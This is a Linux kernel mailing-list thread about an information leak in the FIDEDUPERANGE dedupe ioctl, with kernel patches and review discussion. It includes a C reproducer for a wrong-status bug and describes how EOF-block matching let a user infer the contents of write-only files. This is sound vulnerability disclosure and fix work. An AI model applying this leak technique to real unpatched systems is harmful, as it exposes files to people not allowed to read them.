fs/remap_range.c | 27 +++++++++++++++++++-------- > 1 file changed, 19 insertions(+), 8 deletions(-) > > diff --git a/fs/remap_range.c b/fs/remap_range.c > index e112b5424cdb..ba71ceb8dde3 100644 > --- a/fs/remap_range.c > +++ b/fs/remap_range.c > @@ -409,17 +409,12 @@ EXPORT_SYMBOL(vfs_clone_file_range); > /* Check whether we are allowed to dedupe the destination file */ > static bool allow_file_dedupe(struct file *file) > { > - struct user_namespace *mnt_userns = file_mnt_user_ns(file); > - struct inode *inode = file_inode(file); > - > if (capable(CAP_SYS_ADMIN)) > return true; > + if (file->f_flags & O_APPEND) > + return false; > if (file->f_mode & FMODE_WRITE) > return true; > - if (uid_eq(current_fsuid(), i_uid_into_mnt(mnt_userns, inode))) > - return true; > - if (!inode_permission(mnt_userns, inode, MAY_WRITE)) > - return true; > return false; > } > > @@ -428,6 +423,8 @@ loff_t vfs_dedupe_file_range_one(struct file *src_file, loff_t src_pos, > loff_t len, unsigned int remap_flags) > { > loff_t ret; > + struct inode *dst; > + unsigned long blocksize; > > WARN_ON_ONCE(remap_flags & ~(REMAP_FILE_DEDUP | > REMAP_FILE_CAN_SHORTEN)); > @@ -457,10 +454,17 @@ loff_t vfs_dedupe_file_range_one(struct file *src_file, loff_t src_pos, > goto out_drop_write; > > ret = -EISDIR; > - if (S_ISDIR(file_inode(dst_file)->i_mode)) > + dst = file_inode(dst_file); > + if (S_ISDIR(dst->i_mode)) > goto out_drop_write; > > ret = -EINVAL; > + blocksize = 1ul << dst->i_blkbits; > + if (dst_pos & (blocksize-1)) > + goto out_drop_write; > + if (len & (blocksize-1)) > + goto out_drop_write; > + > if (!dst_file->f_op->remap_file_range) > goto out_drop_write; > > @@ -488,6 +492,7 @@ int vfs_dedupe_file_range(struct file *file, struct file_dedupe_range *same) > int ret; > u16 count = same->dest_count; > loff_t deduped; > + unsigned long blocksize; > > if (!(file->f_mode & FMODE_READ)) > return -EINVAL; > @@ -507,6 +512,12 @@ int vfs_dedupe_file_range(struct file *file, struct file_dedupe_range *same) > if (!file->f_op->remap_file_range) > return -EOPNOTSUPP; > > + blocksize = 1ul << src->i_blkbits; > + if (off & (blocksize-1)) > + return -EINVAL; > + if (len & (blocksize-1)) > + return -EINVAL; > + > ret = remap_verify_area(file, off, len, false); > if (ret < 0) > return ret; ^ permalink raw reply [flat|nested] 33+ messages in thread
* Re: Information Leak: FIDEDUPERANGE ioctl allows reading writeonly files 2022-07-13 0:48 ` Darrick J. Wong @ 2022-07-13 2:58 ` Linus Torvalds 2022-07-13 4:14 ` Linus Torvalds 2022-07-13 6:46 ` Dave Chinner 2022-07-13 17:16 ` Ansgar Lößer 1 sibling, 2 replies; 33+ messages in thread From: Linus Torvalds @ 2022-07-13 2:58 UTC (permalink / raw) To: Darrick J. Wong Cc: Josef Bacik, ansgar.loesser, Christoph Hellwig, Amir Goldstein, Mark Fasheh, Matthew Wilcox, Miklos Szeredi, Al Viro, linux-fsdevel, Security Officers, Max Schlecht, Björn Scheuermann On Tue, Jul 12, 2022 at 5:48 PM Darrick J. Wong <djwong@kernel.org> wrote: > > AFAICT, the reason why dedupe does all the weird checks it does is > because apparently some of the dedupe tools expect that they can do > weird things like dedupe into a file that they own but haven't opened > for writes or could open for writes. Change those bits, and you break > userspace. Christ, what a crock. > The dedupe implementations /do/ check file blocksize, it's under > generic_remap_file_range_prep. The reason this exploit program works on > the 7-byte file is that we stop comparing at EOF, which means that there > are fewer bytes to guess. But. You can already read the file anyway. The dedupe clearly does *not* check for blocksize. It doesn't even call generic_remap_file_range_prep(). Just check it yourself: do_vfs_ioctl -> case FIDEDUPERANGE: ioctl_file_dedupe_range(filp, argp) -> vfs_dedupe_file_range(file, same) -> and there it is. All that calls is remap_verify_area() for both files, and allow_file_dedupe() for the target. Now, maybe some filesystem then calls the checking functions, but considering the posted code, that can't be true, because no, the the whole EOF argument is garbage, because even if the *source* was at EOF, the destination offset should still have been checked for being at a block boundary. And it clearly wasn't, since the code just walks the destination offset one byte at a time. So you may *think* that it checks the file blocksize, but I'm afraid reality disagrees. And no amount of "source is at EOF" is possibly relevant for the destination block size check. > So we're going to break userspace? > https://github.com/markfasheh/duperemove/issues/129 Well, if you're supposed to be able to dedupe read-only files, then the whole "check for writing" is just bogus to begin with. So in no way are any of those checks possibly correct. The destination offset is clearly not checked at all. And if writability isn't something you want honored, then FMODE_WRITE shouldn't have been an issue. > ...and we're going to break deduping the EOF block again? Why are you arguing about something that is clearly broken. The lack of destination offset checking cannot possibly be rigth. No amount of "EOF block" is relevant AT ALL. Stop it. You're making an argument that has nothing to do with the bug at hand. > What /is/ the meaning of S_IMMUTABLE? Documentation/ only says that the > fsverity author thinks it means "read-only contents". If it's the same > as "chmod 0000" in that anyone with a writable fd can still modify the > supposedly immutable file, then what was the point? No, the whole point is that you cannot ever get a writable file descriptor to an immutable file. So if that FMODE_WRITE check is correct, then IS_IMMUTABLE is nonsense. And if MODE_WRITE isn't correct, and dedupe is considered a read-only operation, then *that* isn't valid. You can't have it both ways. Which is it? That's really my point here - all those checks are completely random noise. There is absoltuely no rhyme or reason to them. And the offset check is clearly not there, and you should stop talking about "source EOF", because that is irrelevant. Source EOF may affect the *length* of the block, but it does not affect the offset of the destination. Linus ^ permalink raw reply [flat|nested] 33+ messages in thread
* Re: Information Leak: FIDEDUPERANGE ioctl allows reading writeonly files 2022-07-13 2:58 ` Linus Torvalds @ 2022-07-13 4:14 ` Linus Torvalds 2022-07-13 6:46 ` Dave Chinner 1 sibling, 0 replies; 33+ messages in thread From: Linus Torvalds @ 2022-07-13 4:14 UTC (permalink / raw) To: Darrick J. Wong Cc: Josef Bacik, ansgar.loesser, Christoph Hellwig, Amir Goldstein, Mark Fasheh, Matthew Wilcox, Miklos Szeredi, Al Viro, linux-fsdevel, Security Officers, Max Schlecht, Björn Scheuermann On Tue, Jul 12, 2022 at 7:58 PM Linus Torvalds <torvalds@linuxfoundation.org> wrote: > > Well, if you're supposed to be able to dedupe read-only files, then > the whole "check for writing" is just bogus to begin with. Hmm. Maybe that's too strong. The "if you can write to it, you can always dedup it" does make sense, and then couple that with "other situations are also ok". And if you were to want to dedup things like symlinks (do people?) you need to be able to handle FMODE_PATH cases that aren't FMODE_WRITE. And at that point, the "inode owner" check starts making sense. Except the code doesn't allow symlinks anyway right now, so that's kind of theoretical. But then you really do need to check for IS_IMMUTABLE there too and that it's a valid file type, and not just hope that it's checked for elsewhere. And those checks shouldn't pass just because of CAP_SYS_ADMIN, so that check seems to be in the wrong place too. So maybe it mostly works (apart from how clearly the destination offset alignment check is somehow missing or done too late or whatever), but it all seems very random, with checks spread out and not with any consistency or logic. As an example of this randomness, for the dedup source file, we have three different error returns for checking whether it's ok in vfs_dedupe_file_range(*): if (S_ISDIR(src->i_mode)) return -EISDIR; if (!S_ISREG(src->i_mode)) return -EINVAL; if (!file->f_op->remap_file_range) return -EOPNOTSUPP; but then for the destination check the code does ret = -EISDIR; if (S_ISDIR(file_inode(dst_file)->i_mode)) goto out_drop_write; ret = -EINVAL; if (!dst_file->f_op->remap_file_range) goto out_drop_write; and again - maybe this works, and it's just that the error return is inconsistent for source-vs-target, but it just reinforces that whole "this is all completely ad-hoc and doesn't really make much sense". Linus ^ permalink raw reply [flat|nested] 33+ messages in thread
* Re: Information Leak: FIDEDUPERANGE ioctl allows reading writeonly files 2022-07-13 2:58 ` Linus Torvalds 2022-07-13 4:14 ` Linus Torvalds @ 2022-07-13 6:46 ` Dave Chinner 2022-07-13 7:49 ` [PATCH] fs/remap: constrain dedupe of EOF blocks Dave Chinner ` (2 more replies) 1 sibling, 3 replies; 33+ messages in thread From: Dave Chinner @ 2022-07-13 6:46 UTC (permalink / raw) To: Linus Torvalds Cc: Darrick J. Wong, Josef Bacik, ansgar.loesser, Christoph Hellwig, Amir Goldstein, Mark Fasheh, Matthew Wilcox, Miklos Szeredi, Al Viro, linux-fsdevel, Security Officers, Max Schlecht, Björn Scheuermann On Tue, Jul 12, 2022 at 07:58:11PM -0700, Linus Torvalds wrote: > On Tue, Jul 12, 2022 at 5:48 PM Darrick J. Wong <djwong@kernel.org> wrote: > > > > AFAICT, the reason why dedupe does all the weird checks it does is > > because apparently some of the dedupe tools expect that they can do > > weird things like dedupe into a file that they own but haven't opened > > for writes or could open for writes. Change those bits, and you break > > userspace. > > Christ, what a crock. Yes, the dedupe API is ... poor. But we're stuck with it because someone called Linus Torvalds who keeps telling us that we should not break userspace if there's *any way possible* to avoid doing so.... .... and in this case, I think the problem is avoided by a simple fix to generic_remap_checks(). > > The dedupe implementations /do/ check file blocksize, it's under > > generic_remap_file_range_prep. The reason this exploit program works on > > the 7-byte file is that we stop comparing at EOF, which means that there > > are fewer bytes to guess. But. You can already read the file anyway. > > The dedupe clearly does *not* check for blocksize. It doesn't even > call generic_remap_file_range_prep(). > > Just check it yourself: I did, hours ago, and concluded that you were on the wrong track and I didn't care enough to get involved in a shouting match. But you're not actually understanding the code, nor are you listening to the people who are trying to point out that you haven't understood how the code works. You're causing those people stress and angst by shouting them down even though you are wrong - these people know the code far better than you, so you need to listen to them rather than shout over them. So, let's clear all that away, and just follow the code. I'll map out the path to block alignment for you: > do_vfs_ioctl -> > case FIDEDUPERANGE: > ioctl_file_dedupe_range(filp, argp) -> > vfs_dedupe_file_range(file, same) -> There's no checks at this point because we can't do them safely. We have to first lock the inodes before we check against EOF so that dedupe does not race against truncate, fallocate, or extending writes. This is important because we have to support the "dedupe whole file" case that is defined by src = {0, EOF}, dst = {0, EOF}, and that's where all the complexity lies. Hence we have to continue down the dedupe stack to lock the inodes and perform the block alignment checks: vfs_dedupe_file_range_one() file->f_op->remap_file_range() xfs_file_remap_range() <locks inodes> <performs XFS specific remap checks> generic_remap_file_range_prep() generic_remap_checks() generic_remap_checks() does: ..... loff_t bs = inode_out->i_sb->s_blocksize; int ret; /* The start of both ranges must be aligned to an fs block. */ if (!IS_ALIGNED(pos_in, bs) || !IS_ALIGNED(pos_out, bs)) return -EINVAL; ..... /* * If the user wanted us to link to the infile's EOF, round up to the * next block boundary for this check. * * Otherwise, make sure the count is also block-aligned, having * already confirmed the starting offsets' block alignment. */ if (pos_in + count == size_in) { bcount = ALIGN(size_in, bs) - pos_in; } else { if (!IS_ALIGNED(count, bs)) count = ALIGN_DOWN(count, bs); bcount = count; } It should be clear that this code does not allow unaligned file offsets at all. It should also be clear that we silently round the dedupe length down to block size alignment to avoid sub-block dedupe attempts (not possible) rather than erroring out because it's always valid to dedupe less range than was asked for. However, we also have a special case for the "dedupe to EOF" operation that allows whole file dedupe. In that case, we round the length *up* to capture the whole EOF block in the remap attempt. That's the case where bug the test case exploits lies - it fails to check whether the dst range is also deduping all the way to EOF. We haven't got to the data match checks yet - we're still deciding on the bounds for the data match checks at this point. Hence if we get the bound checks wrong here, the data checks might match when they shouldn't. e.g. by only checking for partial block matches instead of checking all the valid data in both src and dst match. That's the bug in this code - the dedupe length EOF rounding needs to be more constrained as it's allowing an EOF block to be partially matched against any full filesystem block as long as the range from start to EOF in the block matches. That's the information leak right there, and it has nothing to do with permissions. Hence if we restrict EOF block deduping to both the src and dst files having matching EOF offsets in their EOF blocks like so: - if (pos_in + count == size_in) { + if (pos_in + count == size_in && + (!(remap_flags & REMAP_FILE_DEDUP) || pos_out + count == size_out)) { bcount = ALIGN(size_in, bs) - pos_in; } else { if (!IS_ALIGNED(count, bs)) count = ALIGN_DOWN(count, bs); bcount = count; } This should fix the bug that was reported as it prevents dedupe an EOF block against non-EOF blocks or even EOF blocks where EOF is at a different offset into the EOF block. So, yeah, I think arguing about permissions and API and all that stuff is just going completely down the wrong track because it doesn't actually address the root cause of the information leak.... Cheers, Dave. -- Dave Chinner david@fromorbit.com ^ permalink raw reply [flat|nested] 33+ messages in thread
* [PATCH] fs/remap: constrain dedupe of EOF blocks 2022-07-13 6:46 ` Dave Chinner @ 2022-07-13 7:49 ` Dave Chinner 2022-07-13 8:19 ` Linus Torvalds 2022-07-13 17:18 ` Ansgar Lößer 2022-07-13 8:16 ` Information Leak: FIDEDUPERANGE ioctl allows reading writeonly files Linus Torvalds 2022-07-13 17:17 ` Ansgar Lößer 2 siblings, 2 replies; 33+ messages in thread From: Dave Chinner @ 2022-07-13 7:49 UTC (permalink / raw) To: Linus Torvalds Cc: Darrick J. Wong, Josef Bacik, ansgar.loesser, Christoph Hellwig, Amir Goldstein, Mark Fasheh, Matthew Wilcox, Miklos Szeredi, Al Viro, linux-fsdevel, Security Officers, Max Schlecht, Björn Scheuermann From: Dave Chinner <dchinner@redhat.com> If dedupe of an EOF block is not constrainted to match against only other EOF blocks with the same EOF offset into the block, it can match against any other block that has the same matching initial bytes in it, even if the bytes beyond EOF in the source file do not match. Fix this by constraining the EOF block matching to only match against other EOF blocks that have identical EOF offsets and data. This allows "whole file dedupe" to continue to work without allowing eof blocks to randomly match against partial full blocks with the same data. Reported-by: Ansgar Lößer <ansgar.loesser@tu-darmstadt.de> Fixes: 1383a7ed6749 ("vfs: check file ranges before cloning files") Link: https://lore.kernel.org/linux-fsdevel/a7c93559-4ba1-df2f-7a85-55a143696405@tu-darmstadt.de/ Signed-off-by: Dave Chinner <dchinner@redhat.com> --- This is tested against the case provided in the initial report. Old kernel: $ ./dedupe.sh |less secret $ Patched kernel: $ ./dedupe.sh dedupe-bug: t.c:90: main: Assertion `status != FILE_DEDUPE_RANGE_DIFFERS' failed. ./dedupe.sh: line 11: 4831 Aborted /home/dave/dedupe-bug $MNT/writeonly.txt $MNT/test.tmp $ So now it fails with FILE_DEDUPE_RANGE_DIFFERS because it can't use short files to discover the dedupe character match one byte at a time. It also passes fstests ismoke tests via running the './check -g dedupe' test group, so the fix doesn't obviously break anything. fs/remap_range.c | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/fs/remap_range.c b/fs/remap_range.c index e112b5424cdb..881a306ee247 100644 --- a/fs/remap_range.c +++ b/fs/remap_range.c @@ -71,7 +71,8 @@ static int generic_remap_checks(struct file *file_in, loff_t pos_in, * Otherwise, make sure the count is also block-aligned, having * already confirmed the starting offsets' block alignment. */ - if (pos_in + count == size_in) { + if (pos_in + count == size_in && + (!(remap_flags & REMAP_FILE_DEDUP) || pos_out + count == size_out)) { bcount = ALIGN(size_in, bs) - pos_in; } else { if (!IS_ALIGNED(count, bs)) ^ permalink raw reply related [flat|nested] 33+ messages in thread
* Re: [PATCH] fs/remap: constrain dedupe of EOF blocks 2022-07-13 7:49 ` [PATCH] fs/remap: constrain dedupe of EOF blocks Dave Chinner @ 2022-07-13 8:19 ` Linus Torvalds 2022-07-13 17:18 ` Ansgar Lößer 1 sibling, 0 replies; 33+ messages in thread From: Linus Torvalds @ 2022-07-13 8:19 UTC (permalink / raw) To: Dave Chinner Cc: Darrick J. Wong, Josef Bacik, ansgar.loesser, Christoph Hellwig, Amir Goldstein, Mark Fasheh, Matthew Wilcox, Miklos Szeredi, Al Viro, linux-fsdevel, Security Officers, Max Schlecht, Björn Scheuermann On Wed, Jul 13, 2022 at 12:49 AM Dave Chinner <david@fromorbit.com> wrote: > > Fix this by constraining the EOF block matching to only match > against other EOF blocks that have identical EOF offsets and data. So I agree that this patch fixes the bug, but I just spent a long time writing an email about how I think it makes oddly written and fairly incomprehensible code even harder to read. This is likely a minimal patch and as such good for backporting (and just for "current stage of release cycle too" for that matter), but I *really* think the code here could do with a nice chunk of cleanup. Linus ^ permalink raw reply [flat|nested] 33+ messages in thread
* Re: [PATCH] fs/remap: constrain dedupe of EOF blocks 2022-07-13 7:49 ` [PATCH] fs/remap: constrain dedupe of EOF blocks Dave Chinner 2022-07-13 8:19 ` Linus Torvalds @ 2022-07-13 17:18 ` Ansgar Lößer 2022-07-13 17:26 ` Linus Torvalds 1 sibling, 1 reply; 33+ messages in thread From: Ansgar Lößer @ 2022-07-13 17:18 UTC (permalink / raw) To: Dave Chinner, Linus Torvalds Cc: Darrick J. Wong, Josef Bacik, ansgar.loesser, Christoph Hellwig, Amir Goldstein, Mark Fasheh, Matthew Wilcox, Miklos Szeredi, Al Viro, linux-fsdevel, Security Officers, Max Schlecht, Björn Scheuermann There is another problem regarding deduplication and EOF. In some cases the syscall reports successful deduplication even if the data does not match (and thankfully nothing was actually deduplicated). A more formal description of the bug, an example code to exploit it and a proposed solution are attached below. I *think* this behavior is not fixed completely by this patch yet, although I am not sure yet whether the `bad rounding` can still occur. Best regards, Ansgar FIDEDUPERANGE ioctl signals success, even if no bytes were deduplicated The FIDEDUPERANGE ioctl can signal successfull deduplication even though the data in the `src` and `dest` fds does not match. confirmed on 5.18.3 (amd64, debian), introduced in 4.19-rc1 (commit 5740c99e9d30) Reported-by: Ansgar Lößer (ansgar.loesser@kom.tu-darmstadt.de), Max Schlecht (max.schlecht@informatik.hu-berlin.de) and Björn Scheuermann (scheuermann@kom.tu-darmstadt.de) The FIDEDUPERANGE ioctl will set `bytes_deduped` in any provided `file_dedupe_range_info` structs to the `src_length` provided in the main `file_dedupe_range` struct, as long as the deduplication request was generally valid. This is a problem, because `vfs_dedupe_file_range_one(...)` can internally shorten the deduplication range, which can lead to situations where trying to dedupe half a block, leads to the range being shortened down to 0, which results in successfull deduplication. Even worse, the shortening happens before the actual data of the `src` and `dest` fds get compared, which can lead to situations where you're trying to deduplicate two files containing vastly different data, but the ioctl still claims have successfully deduplicated everything. The proposed fix is to return the actual amount of bytes that got deduplicated, instead of the input length. This also seems to have been the standard behavior before 4.19-rc1 (commit 5740c99e9d30). example code to reproduce the issue (`dedupe_wrong_status.c`) ```C #define _XOPEN_SOURCE 500 // pwrite #include <linux/types.h> #include <linux/fs.h> #include <stdio.h> #include <unistd.h> #include <fcntl.h> #include <errno.h> #include <sys/ioctl.h> int main(int argc, char** argv) { int src_fd = open("src_file.tmp", O_RDWR | O_CREAT | O_TRUNC, 0777); if (src_fd == -1) { fprintf(stderr, "failed to open src_file.tmp with %d\n", errno); return -1; } int dest_fd = open("dest_file.tmp", O_RDWR | O_CREAT | O_TRUNC, 0777); if (dest_fd == -1) { fprintf(stderr, "failed to open dest_file.tmp with %d\n", errno); return -1; } // write 1 block + 1 byte of data to each file // src file contains 0 bytes, dest files contains 1 bytes char zero = 0; char one = 1; for (__u64 i = 0; i < 4097; i++) { pwrite(src_fd, &zero, 1, i); pwrite(dest_fd, &one, 1, i); } // truncating src_fd and only writing a single byte, fixes it /* ftruncate(src_fd, 0); pwrite(src_fd, &zero, 1, 0); */ // try to dedupe the first byte of the first block of src_fd // with the first byte of the second block of dest_fd char buffer[sizeof(struct file_dedupe_range) + sizeof(struct file_dedupe_range_info)]; struct file_dedupe_range* arg = (struct file_dedupe_range*)buffer; arg->src_offset = 0; arg->src_length = 1; arg->dest_count = 1; arg->reserved1 = 0; arg->reserved2 = 0; struct file_dedupe_range_info* info = &arg->info[0]; info->dest_fd = dest_fd; info->dest_offset = 4096; info->reserved = 0; int result = ioctl(src_fd, FIDEDUPERANGE, arg); printf("result %d, status %d, bytes deduped %d\n", result, info->status, info->bytes_deduped); // the byte we're trying to dedupe doesn't match, so we expect // status == FILE_DEDUPE_RANGE_DIFFERS (1) // instead this returns status == FILE_DEDUPE_RANGE_SAME (0) // and bytes_deduped is set to 1 close(src_fd); close(dest_fd); return 0; } ``` proposed fix (dedupe_wrong_status.patch) ``` diff --git a/fs/remap_range.c b/fs/remap_range.c index e112b54..072c2c4 100644 --- a/fs/remap_range.c +++ b/fs/remap_range.c @@ -546,7 +546,7 @@ int vfs_dedupe_file_range(struct file *file, struct file_dedupe_range *same) else if (deduped < 0) info->status = deduped; else - info->bytes_deduped = len; + info->bytes_deduped = deduped; next_fdput: fdput(dst_fd); ``` Am 13.07.2022 um 09:49 schrieb Dave Chinner: > From: Dave Chinner <dchinner@redhat.com> > > If dedupe of an EOF block is not constrainted to match against only > other EOF blocks with the same EOF offset into the block, it can > match against any other block that has the same matching initial > bytes in it, even if the bytes beyond EOF in the source file do > not match. > > Fix this by constraining the EOF block matching to only match > against other EOF blocks that have identical EOF offsets and data. > This allows "whole file dedupe" to continue to work without allowing > eof blocks to randomly match against partial full blocks with the > same data. > > Reported-by: Ansgar Lößer <ansgar.loesser@tu-darmstadt.de> > Fixes: 1383a7ed6749 ("vfs: check file ranges before cloning files") > Link: https://lore.kernel.org/linux-fsdevel/a7c93559-4ba1-df2f-7a85-55a143696405@tu-darmstadt.de/ > Signed-off-by: Dave Chinner <dchinner@redhat.com> > --- > > This is tested against the case provided in the initial report. Old > kernel: > > $ ./dedupe.sh |less > secret > $ > > Patched kernel: > > $ ./dedupe.sh > dedupe-bug: t.c:90: main: Assertion `status != FILE_DEDUPE_RANGE_DIFFERS' failed. > ./dedupe.sh: line 11: 4831 Aborted /home/dave/dedupe-bug $MNT/writeonly.txt $MNT/test.tmp > $ > > So now it fails with FILE_DEDUPE_RANGE_DIFFERS because it can't use > short files to discover the dedupe character match one byte at a > time. > > It also passes fstests ismoke tests via running the './check -g > dedupe' test group, so the fix doesn't obviously break anything. > > fs/remap_range.c | 3 ++- > 1 file changed, 2 insertions(+), 1 deletion(-) > > diff --git a/fs/remap_range.c b/fs/remap_range.c > index e112b5424cdb..881a306ee247 100644 > --- a/fs/remap_range.c > +++ b/fs/remap_range.c > @@ -71,7 +71,8 @@ static int generic_remap_checks(struct file *file_in, loff_t pos_in, > * Otherwise, make sure the count is also block-aligned, having > * already confirmed the starting offsets' block alignment. > */ > - if (pos_in + count == size_in) { > + if (pos_in + count == size_in && > + (!(remap_flags & REMAP_FILE_DEDUP) || pos_out + count == size_out)) { > bcount = ALIGN(size_in, bs) - pos_in; > } else { > if (!IS_ALIGNED(count, bs)) -- M.Sc. Ansgar Lößer Fachgebiet Kommunikationsnetze Fachbereich für Elektrotechnik und Informationstechnik Technische Universität Darmstadt Rundeturmstraße 10 64283 Darmstadt E-Mail: ansgar.loesser@kom.tu-darmstadt.de http://www.kom.tu-darmstadt.de ^ permalink raw reply related [flat|nested] 33+ messages in thread
* Re: [PATCH] fs/remap: constrain dedupe of EOF blocks 2022-07-13 17:18 ` Ansgar Lößer @ 2022-07-13 17:26 ` Linus Torvalds 2022-07-13 18:51 ` [PATCH] vf/remap: return the amount of bytes actually deduplicated Ansgar Lößer 0 siblings, 1 reply; 33+ messages in thread From: Linus Torvalds @ 2022-07-13 17:26 UTC (permalink / raw) To: ansgar.loesser Cc: Dave Chinner, Darrick J. Wong, Josef Bacik, Christoph Hellwig, Amir Goldstein, Mark Fasheh, Matthew Wilcox, Miklos Szeredi, Al Viro, linux-fsdevel, Security Officers, Max Schlecht, Björn Scheuermann On Wed, Jul 13, 2022 at 10:18 AM Ansgar Lößer <ansgar.loesser@tu-darmstadt.de> wrote: > > The proposed fix is to return the actual amount of bytes that got > deduplicated, instead of the input length. Ack, that patch seems obviously correct. Mind sending it with a sign-off and a short commit message? Linus ^ permalink raw reply [flat|nested] 33+ messages in thread
* [PATCH] vf/remap: return the amount of bytes actually deduplicated 2022-07-13 17:26 ` Linus Torvalds @ 2022-07-13 18:51 ` Ansgar Lößer 2022-07-13 19:09 ` Linus Torvalds ` (2 more replies) 0 siblings, 3 replies; 33+ messages in thread From: Ansgar Lößer @ 2022-07-13 18:51 UTC (permalink / raw) To: Linus Torvalds, ansgar.loesser Cc: Dave Chinner, Darrick J. Wong, Josef Bacik, Christoph Hellwig, Amir Goldstein, Mark Fasheh, Matthew Wilcox, Miklos Szeredi, Al Viro, linux-fsdevel, Security Officers, Max Schlecht, Björn Scheuermann When using the FIDEDUPRANGE ioctl, in case of success the requested size is returned. In some cases this might not be the actual amount of bytes deduplicated. This change modifies vfs_dedupe_file_range() to report the actual amount of bytes deduplicated, instead of the requested amount. Link: https://lore.kernel.org/linux-fsdevel/5548ef63-62f9-4f46-5793-03165ceccacc@tu-darmstadt.de/ Reported-by: Ansgar Lößer (ansgar.loesser@kom.tu-darmstadt.de) Reported-by: Max Schlecht (max.schlecht@informatik.hu-berlin.de) Reported-by: Björn Scheuermann (scheuermann@kom.tu-darmstadt.de) Signed-off-by: Ansgar Lößer <ansgar.loesser@kom.tu-darmstadt.de> --- > Mind sending it with a sign-off and a short commit message? > > Linus Sure, thank you! This is my first commit, so I hope it is ok like this. fs/remap_range.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/fs/remap_range.c b/fs/remap_range.c index e112b5424cdb..072c2c48aeed 100644 --- a/fs/remap_range.c +++ b/fs/remap_range.c @@ -546,7 +546,7 @@ int vfs_dedupe_file_range(struct file *file, struct file_dedupe_range *same) else if (deduped < 0) info->status = deduped; else - info->bytes_deduped = len; + info->bytes_deduped = deduped; next_fdput: fdput(dst_fd); -- 2.35.1 -- M.Sc. Ansgar Lößer Fachgebiet Kommunikationsnetze Fachbereich für Elektrotechnik und Informationstechnik Technische Universität Darmstadt Rundeturmstraße 10 64283 Darmstadt E-Mail: ansgar.loesser@kom.tu-darmstadt.de http://www.kom.tu-darmstadt.de ^ permalink raw reply related [flat|nested] 33+ messages in thread
* Re: [PATCH] vf/remap: return the amount of bytes actually deduplicated 2022-07-13 18:51 ` [PATCH] vf/remap: return the amount of bytes actually deduplicated Ansgar Lößer @ 2022-07-13 19:09 ` Linus Torvalds 2022-07-14 0:22 ` Dave Chinner 2022-07-14 22:32 ` Dave Chinner 2 siblings, 0 replies; 33+ messages in thread From: Linus Torvalds @ 2022-07-13 19:09 UTC (permalink / raw) To: ansgar.loesser Cc: Dave Chinner, Darrick J. Wong, Josef Bacik, Christoph Hellwig, Amir Goldstein, Mark Fasheh, Matthew Wilcox, Miklos Szeredi, Al Viro, linux-fsdevel, Security Officers, Max Schlecht, Björn Scheuermann On Wed, Jul 13, 2022 at 11:51 AM Ansgar Lößer <ansgar.loesser@tu-darmstadt.de> wrote: > > This is my first commit, so I hope it is ok like this. The patch was whitespace-damaged (tabs converted to spaces, but also extra spaces), but with something this small and simple I just fixed it up manually. Linus ^ permalink raw reply [flat|nested] 33+ messages in thread
* Re: [PATCH] vf/remap: return the amount of bytes actually deduplicated 2022-07-13 18:51 ` [PATCH] vf/remap: return the amount of bytes actually deduplicated Ansgar Lößer 2022-07-13 19:09 ` Linus Torvalds @ 2022-07-14 0:22 ` Dave Chinner 2022-07-14 1:03 ` Linus Torvalds 2022-07-16 21:15 ` Mark Fasheh 2022-07-14 22:32 ` Dave Chinner 2 siblings, 2 replies; 33+ messages in thread From: Dave Chinner @ 2022-07-14 0:22 UTC (permalink / raw) To: ansgar.loesser Cc: Linus Torvalds, Darrick J. Wong, Josef Bacik, Christoph Hellwig, Amir Goldstein, Mark Fasheh, Matthew Wilcox, Miklos Szeredi, Al Viro, linux-fsdevel, Security Officers, Max Schlecht, Björn Scheuermann On Wed, Jul 13, 2022 at 08:51:44PM +0200, Ansgar Lößer wrote: > When using the FIDEDUPRANGE ioctl, in case of success the requested size > is returned. In some cases this might not be the actual amount of bytes > deduplicated. > > This change modifies vfs_dedupe_file_range() to report the actual amount > of bytes deduplicated, instead of the requested amount. > > Link: https://lore.kernel.org/linux-fsdevel/5548ef63-62f9-4f46-5793-03165ceccacc@tu-darmstadt.de/ > > Reported-by: Ansgar Lößer (ansgar.loesser@kom.tu-darmstadt.de) > Reported-by: Max Schlecht (max.schlecht@informatik.hu-berlin.de) > Reported-by: Björn Scheuermann (scheuermann@kom.tu-darmstadt.de) > Signed-off-by: Ansgar Lößer <ansgar.loesser@kom.tu-darmstadt.de> > --- > > > Mind sending it with a sign-off and a short commit message? > > > > Linus > Sure, thank you! > > This is my first commit, so I hope it is ok like this. > > > fs/remap_range.c | 2 +- > 1 file changed, 1 insertion(+), 1 deletion(-) > > diff --git a/fs/remap_range.c b/fs/remap_range.c > index e112b5424cdb..072c2c48aeed 100644 > --- a/fs/remap_range.c > +++ b/fs/remap_range.c > @@ -546,7 +546,7 @@ int vfs_dedupe_file_range(struct file *file, struct > file_dedupe_range *same) > else if (deduped < 0) > info->status = deduped; > else > - info->bytes_deduped = len; > + info->bytes_deduped = deduped; > > next_fdput: > fdput(dst_fd); That's a potential change of API behaviour that userspace may barf on as this now can return "success/0 bytes" instead of "success/len". e.g. If userspace is looping over a file based on the returned info->bytes_deduped value, can this change cause them to behave differently? e.g. get stuck in an endless loop on the EOF block always returning SAME/0 instead of DIFFER? Also, doesn't this just paper over the bug in vfs_dedupe_file_range_compare() where it returns is_same = true when the length to compare is zero as will happen when comparing differing EOF blocks now when it should be returning -EBADE? Cheers, Dave. -- Dave Chinner david@fromorbit.com ^ permalink raw reply [flat|nested] 33+ messages in thread
* Re: [PATCH] vf/remap: return the amount of bytes actually deduplicated 2022-07-14 0:22 ` Dave Chinner @ 2022-07-14 1:03 ` Linus Torvalds 2022-07-16 21:15 ` Mark Fasheh 1 sibling, 0 replies; 33+ messages in thread From: Linus Torvalds @ 2022-07-14 1:03 UTC (permalink / raw) To: Dave Chinner Cc: ansgar.loesser, Darrick J. Wong, Josef Bacik, Christoph Hellwig, Amir Goldstein, Mark Fasheh, Matthew Wilcox, Miklos Szeredi, Al Viro, linux-fsdevel, Security Officers, Max Schlecht, Björn Scheuermann On Wed, Jul 13, 2022 at 5:22 PM Dave Chinner <david@fromorbit.com> wrote: > > e.g. If userspace is looping over a file based on the returned > info->bytes_deduped value, can this change cause them to behave > differently? e.g. get stuck in an endless loop on the EOF block > always returning SAME/0 instead of DIFFER? I don't think that case can actually happen. There's a couple of cases where the length is updated (a) an initial zero length request is turned into "size of file". Here,we'd obviously want to return that size. Plus the original len was 0 anyway, so it already used that 0 before. Ugh. (b) an EOF situation with REMAP_FILE_CAN_SHORTEN does that *len = new_len; but afaik "new_len" can never be zero (because if it was, that would have been blk-aligned to begin with, and not have reached that code) But you are right, the whole "SAME/0" return is all 